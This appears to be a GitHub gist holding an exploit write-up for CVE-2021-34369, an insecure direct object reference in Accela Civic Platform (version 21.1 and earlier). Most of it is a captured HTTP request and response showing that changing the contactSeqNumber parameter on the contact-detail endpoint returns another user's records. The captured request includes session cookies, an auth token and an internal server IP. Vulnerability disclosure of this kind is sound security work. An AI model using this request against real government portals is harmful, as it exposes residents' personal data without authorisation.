This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Accela Civic Platform Insecure Direct Object References <= 21.1 | |
| # Date: June/9/2021 | |
| # Exploit Author: Abdul Azeez Alaseeri | |
| # Author page: https://www.linkedin.com/in/0xx777/ | |
| # Vendor Homepage: https://www.accela.com/civic-platform/ | |
| # CVE-2021-34369 | |
| ================================================================ | |
| Accela Civic Platform Insecure Direct Object References <= 21.1 | |
| ================================================================ | |
| This vulnerability allows authenticated attackers to view other user's data by manpulating the value of contactSeqNumber | |
| ================================================================ | |
| Request Heeaders start | |
| ================================================================ | |
| GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1 | |
| Host: Hidden | |
| Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802 | |
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Upgrade-Insecure-Requests: 1 | |
| Te: trailers | |
| Connection: close | |
| ================================================================ | |
| Request Heeaders end | |
| ================================================================ | |
| ================================================================ | |
| Response Heeaders start | |
| ================================================================ | |
| HTTP/1.1 200 OK | |
| Expires: Thu, 01 Jan 1970 00:00:01 GMT | |
| Cache-Control: no-cache | |
| X-Powered-By: JSP/2.3 | |
| Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure | |
| Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure | |
| Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure | |
| Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure | |
| X-XSS-Protection: 0 | |
| Pragma: No-cache | |
| X-UA-Compatible: IE=EDGE | |
| Date: Wed, 09 Jun 2021 04:09:40 GMT | |
| Connection: close | |
| Content-Type: text/html;charset=UTF-8 | |
| Content-Length: 98126 | |
| ================================================================ | |
| Response Heeaders end | |
| ================================================================ | |
| contactSeqNumber value can be changed and return valid information about another user and that indicates it is vulnerable to IDOR | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment